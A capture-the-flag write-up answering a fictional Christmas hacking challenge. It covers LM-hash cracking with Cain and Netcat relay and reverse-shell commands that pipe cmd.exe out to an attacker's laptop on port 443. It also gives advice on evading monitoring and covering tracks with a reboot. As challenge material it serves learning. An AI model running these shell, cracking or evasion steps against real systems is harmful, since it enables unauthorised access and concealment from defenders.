Security Ripcord


EHN Skillz Challenge - A Christmas (Hacking) Story

I just found the Ethical Hacker Network site about two months ago.  The thing that drew me to it was the hacking challenges written by Ed Skoudis and friends.  I decided to cut my teeth on the most recent version of the Skillz Challenge which Ed titled, "A Christmas (Hacking) Story."  The following is my submission to this challenge.  The due time and date were midnight 12/22 so I am not giving anything away here.  Wish me luck.  If you see anything that I missed please post it in the comments.


1) What is interesting about the files that Ralphie could see on the lamp server?

There are several interesting things about the files and their descriptions.  First let us address the files themselves.  

  • The first file, "chimney", is a named pipe, also known as a FIFO (First In, First Out).  It shows up in a directory listing like an ordinary file, but it holds no data on disk: whatever one process writes into it is handed to whichever process reads from it, in the same order it was written.  This type of file is used "to allow totally unrelated programs to communicate with each other." (Source: http://www2.linuxjournal.com/article/2156) 
  • The second file "nc" is the Netcat program.  "Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol."  (Source: http://netcat.sourceforge.net/)  This file can be used to connect to services on the local system, to services on other systems within the local network, or to services on systems outside of the network.

Besides the files themselves, the next interesting thing is the permissions they have been assigned.  Any user on the lamp can run the program because the "nc" file has "read" and "execute" permission for owner, group, and world, and any user can interact with "chimney" because it has "read" and "write" permission for owner, group, and world.  Together these mean that even the unprivileged account under which Ralphie's e-mailed command runs can use both files. 

2) What is the significance of the Annie cyphertext?

When trying to decipher a code, the first thing to look for is a common thread in the evidence.  The first thing that stands out is that every line contains exactly 32 hexadecimal characters.  The next thing that stands out is that the last 16 characters of every line are identical (AAD3B435B51404EE).  A quick Google search for these characters finds an interesting post from the Openwall John the Ripper mailing list: "John is only checking the second half of the LM hash for the value of AAD3B435B51404EE to deduce that the password is no more than 7 characters long." (Source: http://www.openwall.com/lists/john-users/2005/05/23/10)  The reason this works is that the LM algorithm upper-cases the password, pads it to 14 bytes, and encrypts a fixed constant with each 7-byte half separately; an empty half always produces AAD3B435B51404EE, so a hash ending in that value belongs to a password of at most 7 characters.  Each line is therefore a password run through the LM hash algorithm, and every one of them is 7 characters or shorter.  

"Cain and Abel" by Oxid.it (Source: http://www.oxid.it/cain.html) is a program that will recover the passwords behind LM hashes.  It is the "Cain" portion of the program that accepts a list of LM hashes for cracking.  To feed LM hashes to the program they must be in a formatted text file, and one format that "Cain" understands is the L0phtCrack version 2.x format.  Finding a good example of this file format on the Internet proved to be a challenge.  Perhaps the easiest and fastest way to determine the file format is to have "Cain" import the hashes from the local system and then export them to a file.  To do this, perform the following steps:

  • On a Windows system where you have approval to work, start "Cain".
  • Select the "Cracker" tab.
  • In the left box highlight "LM & NTLM Hashes".
  • Click the "+" button.
  • Select the "Import Hashes from local system" radio button then click the "Next" button. 
    • "Cain" will be populated with the accounts from the local system.
    • NOTE:  This does not reveal the password for the local account unless a cracking attack is initiated and successful.
  • Right click on an account and select "Export".
  • Save the file to a special directory with the type "L0phtCrack 2.x file (*.lc)".
    • Each line within the file is a colon delimited field
    • The first field is the account name
    • Not sure what the second field is except that it possibly indicates the delimiter used for the next field.
    • Password - LM Hash and NT Hash separated by a colon (Source: http://www.morehouse.org/hin/l0pht/lophtcrackfaq.htm)

Now that the file format has been determined the hashes provided by Annie can be put into the same format. 

  • Change the account name field so that each line is numbered 1 through 12. 
  • Substitute the first part of the password field with the provided LM Hash. 
  • Leave the second part of the password field blank but DO include the colon at the end of the line.  

After the new password file has been created, remove the imported local accounts from the list, and import the new file in the same manner as before, except this time select "Import Hashes from a text file" when prompted.  
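The two observations from question 2 (32 hex characters, second half always AAD3B435B51404EE) and the file-format steps above, as an added Python example that is not part of the original submission.  The pwdump-style line layout user:rid:LM:NT::: (second field = the account's RID) is my assumption about what Cain's L0phtCrack 2.x importer accepts; the sample hashes are a constructed set, not Annie's list, except that E52CAC67419A9A224A3B108F3FA6CB6D is the widely published LM hash of "password".

```python
import re

# The value every LM hash half takes when that half of the password is empty
# (DES of the fixed LM constant under an all-NUL 7-byte key).
EMPTY_LM_HALF = "AAD3B435B51404EE"
LM_HASH_RE = re.compile(r"^[0-9A-Fa-f]{32}$")

# Constructed sample set (not Annie's list): the empty-password hash, the
# well-known LM hash of "password", and an invented value whose second half is
# the empty marker so that it reads as a password of at most 7 characters.
SAMPLE_HASHES = [
    "AAD3B435B51404EEAAD3B435B51404EE",
    "E52CAC67419A9A224A3B108F3FA6CB6D",
    "0123456789ABCDEFAAD3B435B51404EE",
]


def lm_traits(candidate):
    """Classify one string as an LM hash.

    LM upper-cases the password, pads it to 14 bytes and hashes the two
    7-byte halves independently, so the second half alone tells us whether
    the password is longer than 7 characters.
    """
    text = candidate.strip()
    if not LM_HASH_RE.match(text):
        return {"valid": False, "empty": False, "at_most_7": False}
    text = text.upper()
    first, second = text[:16], text[16:]
    return {
        "valid": True,
        "empty": first == EMPTY_LM_HALF and second == EMPTY_LM_HALF,
        "at_most_7": second == EMPTY_LM_HALF,
    }


def unique_halves(hashes):
    """Distinct non-empty 8-byte halves: the work a cracker actually has to
    do, since each half is an independent DES computation and repeats
    across accounts only need to be cracked once."""
    halves = set()
    for h in hashes:
        if not lm_traits(h)["valid"]:
            continue
        h = h.strip().upper()
        for half in (h[:16], h[16:]):
            if half != EMPTY_LM_HALF:
                halves.add(half)
    return halves


def to_pwdump(hashes, nt_hash=""):
    """Write the hashes as pwdump/L0phtCrack-style lines
    (user:rid:LM:NT:comment:homedir:), which is assumed here to be what
    Cain's importer reads.  Accounts are numbered 1..n as in the procedure
    above and the NT field is left blank."""
    lines = []
    for i, h in enumerate(hashes, start=1):
        if not lm_traits(h)["valid"]:
            raise ValueError("not a 32-hex-character LM hash: %r" % h)
        lines.append("%d:%d:%s:%s:::" % (i, i, h.strip().upper(), nt_hash))
    return lines


if __name__ == "__main__":
    for h in SAMPLE_HASHES:
        print(h, lm_traits(h))
    print("halves to crack:", sorted(unique_halves(SAMPLE_HASHES)))
    print("\n".join(to_pwdump(SAMPLE_HASHES)))
```

Running it on Annie's twelve lines would show at once that every second half is the empty marker, and the half-level de-duplication is why a brute-force of the remaining halves is a matter of minutes rather than hours.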

"Cain" can run a Brute-Force attack against the LM hashes.  Select all of the accounts, right click, and select "Brute-Force Attack -> LM Hashes".  To save time, change the default character set to include only the alphabet, then click the "Start" button.   Once the attack is started "Cain" immediately cracks 10 of the hashes and then reports that it will take an additional 22 minutes to finish the rest.  While the Brute-Force attack is running, a dictionary word list can be downloaded from any number of websites; one example is from the Packet Storm site, specifically: http://packetstormsecurity.org/Crackers/wordlists/dictionaries/allwords.gz.  Once the file has been saved locally the brute force attack can be stopped.  At this point all but two of the hashes have been cracked: numbers 6 and 8.  Highlight both of these hashes, right click, and select "Dictionary Attack -> LM Hashes".   Click the "Add" button and select the dictionary file.  Because LM upper-cases every password before hashing it, the cracked passwords can only ever come out in upper case, so select only "Uppercase" and then click the "Start" button.  A few seconds later these last two hashes have been cracked. 

Annie's secret message:  "DRINK MORE OVAL TINE BUY COUNTER HACK RELOADE USE NET CAT RELAY". 

Breaking the message down shows why it matters:

DRINK MORE OVAL TINE - translates to "this challenge is going to take a while and you might want some nice sweet chocolate flavored milk before you begin."

BUY COUNTER HACK RELOADE - is merely a blatant marketing plug by some desperate author :-)

USE NET CAT RELAY - is a clue on how to pass information between a Netcat server and client using a FIFO file.  This is important because the files available on the LAMP server are exactly the Netcat program ("nc") and a FIFO file ("chimney").   Annie must have some amazing hacking, premonition, or ninja skills. 

3) What command could Ralphie e-mail to the lamp to get access to the command shell on the furnace server from the kid's network to read the Christmas list?  What should Ralphie do on his own laptop for this to work?  Assume that you cannot alter the configuration of the lamp or get any higher privileges on that machine, nor can you reconfigure the firewall.

Ralphie has two options for the command he could send to the LAMP system; either one ends with the shell behind the Netcat listener on the furnace system (10.10.10.10, port 2222) arriving at Ralphie's laptop (10.11.11.11, port 443).  In the relay, the lamp makes both outbound connections: the first nc reads its standard input from the "chimney" FIFO and sends it to the laptop, its standard output is piped into the second nc, which sends it to the furnace, and the furnace's replies go from the second nc's standard output back into "chimney", where the first nc picks them up and sends them to the laptop.  In the direct connect, the furnace itself is told to start a second nc.exe that calls the laptop back.

  • Netcat Relay (preferred option)
    • nc -n 10.11.11.11 443 0<chimney | nc -n 10.10.10.10 2222 1>chimney
  • Direct Connect
    • echo "nc.exe -n 10.11.11.11 -e cmd.exe 443" | nc -n 10.10.10.10 2222

For Ralphie's laptop to accept the incoming connection he must start a Netcat listener with the command "nc -l -p 443" (on a Unix-like laptop this needs root, since 443 is a privileged port).  This command must be running BEFORE the e-mail is sent to the LAMP system, because the lamp makes a single outbound attempt and the listener has to already be there to accept it. 

4) How can Ralphie make the activities you describe above less likely to be detected by his Old Man?

All traffic leaving the network through the firewall could be sent through a proxy on the firewall or otherwise monitored.  The only ports open for egress are 80 and 443.  Port 80 is easy to proxy or monitor because the traffic that should be flowing through it is clear text.  Port 443, on the other hand, is not as easily proxied or monitored because the traffic is expected to be encrypted.  Ralphie is betting that unencrypted traffic egressing the network on port 443 will not be inspected or logged, so the Netcat listener on his laptop should listen on port 443.  The bet only holds against port-based filtering: a proxy or sensor that expects a TLS handshake on 443 will see the cmd.exe banner go by in the clear. 
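The detection side of that bet, as an added Python example that is not part of the original submission: a check a sensor on the firewall could apply to the first client-to-server bytes of every flow to port 443.  The three flows are constructed, not captured; the second one carries what a relayed cmd.exe sends first, its version banner.

```python
# Constructed first client-to-server bytes of three flows to TCP/443.
SAMPLE_FLOWS = [
    # a genuine TLS ClientHello: record type 0x16, record version 3.1,
    # handshake type 0x01 at offset 5
    ("10.10.10.5:50123 -> 10.11.11.11:443",
     bytes.fromhex("16030100a5010000a10303") + b"\x00" * 32),
    # what the relayed furnace shell sends first: its banner, in the clear
    ("10.10.10.5:50124 -> 10.11.11.11:443",
     b"Microsoft Windows [Version 5.2.3790]\r\n"),
    # plain HTTP on 443 is just as visible
    ("10.10.10.5:50125 -> 10.11.11.11:443",
     b"GET / HTTP/1.1\r\nHost: example\r\n\r\n"),
]


def looks_like_tls_client_hello(first_bytes):
    """True if the bytes open with a TLS record header carrying a ClientHello:
    content type 0x16 (handshake), record version 0x03 0x00..0x03, and
    handshake type 0x01 at offset 5."""
    if len(first_bytes) < 6:
        return False
    return (first_bytes[0] == 0x16
            and first_bytes[1] == 0x03
            and first_bytes[2] in (0x00, 0x01, 0x02, 0x03)
            and first_bytes[5] == 0x01)


def non_tls_on_443(flows):
    """Return the labels of flows to port 443 whose first payload does not
    look like the start of a TLS handshake."""
    flagged = []
    for label, payload in flows:
        dst_port = int(label.split(":")[-1])
        if dst_port == 443 and not looks_like_tls_client_hello(payload):
            flagged.append(label)
    return flagged


if __name__ == "__main__":
    for label in non_tls_on_443(SAMPLE_FLOWS):
        print("non-TLS traffic on 443:", label)
```

The check is deliberately strict: an SSLv2-compatible ClientHello starts with a length byte whose high bit is set (0x80) rather than 0x16, so a sensor in an environment that still sees those would have to allow that shape too.  The point for Ralphie is simply that "it is on 443" is not the same as "it is encrypted", and a first-packet check like this one costs the defender almost nothing.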

Ralphie definitely wants the Netcat Relay option and not the Direct Connect option when connecting his system to the furnace system.  The reason is simple: the furnace's listener spawns cmd.exe either way, but the Direct Connect option additionally starts a second nc.exe on the furnace that makes its own outbound connection to Ralphie's laptop, which is one more process and one more connection that could show up in the system logs or in a netstat listing. 

Although each Netcat command uses IP addresses for the hosts it connects to, there is still the potential for extraneous DNS traffic, because Netcat will attempt a reverse lookup of the address unless told not to.  To avoid this, each Netcat command run within the Protected Network should use the "-n" option, which instructs the program to use "numeric-only IP addresses, no DNS." (Source: Netcat cruft). 

Once the connection between Ralphie's system and the furnace system has been established Ralphie will be presented with a command prompt.  As this activity is highly suspect he will want to limit the amount of data stored on his own system that could point to this incident.  As he only wants to know whether the "official Red Rider carbine-action, two hundred Gig model laptop" appears in the "Christmas_gift_list.txt" file, he should use the Windows "type" command (i.e. "type C:\Christmas_gift_list.txt"), which outputs the list to the screen, or "findstr" with a word from the item's name to show only the matching line.  

The big challenge for Ralphie is the Netcat connection between the LAMP system and the furnace system.   Once Ralphie has determined the contents of the Christmas_gift_list.txt file he may be tempted to interrupt the Netcat connection between his system and the furnace system by entering "Ctrl-C".  This will indeed stop the connection between his system and the LAMP system, but it can leave the connection between the LAMP and furnace systems "hanging."  This is a bad state for the furnace system because the Netcat listener will not be able to accept incoming connections, no other program will be able to bind to port 2222, and the Netcat listener command will still be listed as a running process.  Additionally, the Netcat client will also remain in the process list on the LAMP system.  (Whether the lamp-side client really survives depends on how that Netcat build behaves once the laptop goes away: the first nc sees its socket close, and the second nc may die with SIGPIPE the next time it writes furnace output into a FIFO that nobody is reading.  Ralphie cannot count on either outcome, so he should plan for the worst case.) 

Another problem is that the Netcat listener on the furnace system was not started with the "-L" option, which on the Windows build is what makes a listener persistent: with "-L", nc.exe goes back to listening after each connection closes, while without it nc.exe exits once its single connection is over and nothing restarts it.  So once the listener is shut down the Old Man's backdoor is gone, and he would notice.  The best case scenario would be to find a way to stop the connection between the LAMP and furnace systems and then restart the Netcat listener on the furnace system.  Normally this would be easily accomplished with the Windows Management Instrumentation Command-line (WMIC) that ships with Windows 2003.  The following commands would identify the Netcat process, stop it, and then restart it.

  • wmic process where "commandline like '%nc.exe -l -p 2222%'" get processid
    • Matching on a substring of the command line is more robust than an exact match, which fails if the listener was launched with a full path or extra quoting.
  • wmic process where processid=<PID> delete
  • wmic process call create "nc.exe -l -p 2222 -e cmd.exe"

Unfortunately there is a problem with this solution.  WMIC is an interactive console tool and does not behave properly when its input and output are a Netcat socket rather than a real console: if Ralphie tries it, his connection to the furnace system will "freeze" and the connection between the LAMP and furnace systems will remain.  

In order for Ralphie to disconnect the LAMP system from the furnace system he has to take a drastic step: restart the furnace system.  To do this Ralphie must enter the following command: "shutdown -r -t 01".  This will restart the furnace system and hopefully Ralphie's Old Man will figure it was just another Windows glitch.  Should the Old Man happen to be curious though, he may decide to take a quick glance at the event logs.  Fortunately the only evidence pointing at the command itself is in the System Event Log (event ID 1074, source USER32).  This message reads: "The process winlogon.exe has initiated the restart of FURNACE for the following reason: No title for this reason could be found."  The reboot also leaves the routine event log service stop and start entries (6006 and 6005) that every restart writes, which is exactly why it may pass as just another Windows glitch.  Merry Christmas.





One Response to “EHN Skillz Challenge - A Christmas (Hacking) Story”

  1. [...] The results to the Christmas (Hacking) Story Skillz Challenge have been posted at The Ethical Hacker Network .  I had hoped that my answer was sufficient enough to win top prize.  Alas, it was not.  I did, however, get honorable mention in the Creative category which pleases me very much. [...]
